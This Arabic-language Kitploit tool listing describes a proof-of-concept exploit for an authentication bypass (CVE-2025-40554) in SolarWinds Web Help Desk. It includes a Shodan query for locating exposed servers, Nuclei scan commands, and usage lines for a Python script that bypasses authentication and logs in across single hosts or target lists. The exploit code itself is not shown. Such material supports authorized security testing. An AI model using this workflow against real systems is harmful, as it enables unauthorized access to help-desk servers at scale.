Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
auth-bypass-CVE-2025-40554 — إثبات المفهوم لثغرة CVE-2025-40554، وهي تجاوز للمصادقة في SolarWinds Web Help Desk. يشمل قالب Nuclei واستغلال بلغة Python لاختبار هدف واحد أو دفعة مع إمكانية تسجيل الدخول باستخدام بيانات الاعتماد. | Kitploit
أدوات/GitHubGitHub/imbas007/auth-bypass-cve-2025-40554
المصادقة والترخيصماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubimbas007/auth-bypass-cve-2025-40554

auth-bypass-CVE-2025-40554

إثبات المفهوم لثغرة CVE-2025-40554، وهي تجاوز للمصادقة في SolarWinds Web Help Desk. يشمل قالب Nuclei واستغلال بلغة Python لاختبار هدف واحد أو دفعة مع إمكانية تسجيل الدخول باستخدام بيانات الاعتماد.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
14منذ 7 أشهرلم تتم المراجعة بعد

CVE-2025-40554 – SolarWinds Web Help Desk تجاوز المصادقة PoC

استعلام Shodan

root@kitploit:~
http.favicon.hash:"1895809524"

Nuclei

root@kitploit:~
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
root@kitploit:~
pip install -r requirements.txt

الاستخدام

هدف واحد (تجاوز + تسجيل دخول، العميل الافتراضي/العميل):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443
صورة

هدف واحد مع بيانات اعتماد مخصصة:

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass

هدف واحد، تجاوز فقط (بدون تسجيل دخول):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login

قائمة الأهداف (يحفظ الأهداف الضعيفة+تسجيل الدخول فقط):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt

قائمة الأهداف مع بيانات اعتماد مخصصة:

root@kitploit:~
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret

الوضع الصامت (طباعة عناوين URL التي نجح فيها تسجيل الدخول فقط):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt -q

إخلاء مسؤولية

إثبات المفهوم هذا مخصص للبحث والاختبار الأمني المصرح به فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. المؤلفون غير مسؤولين عن سوء الاستخدام.

تنزيل الأداة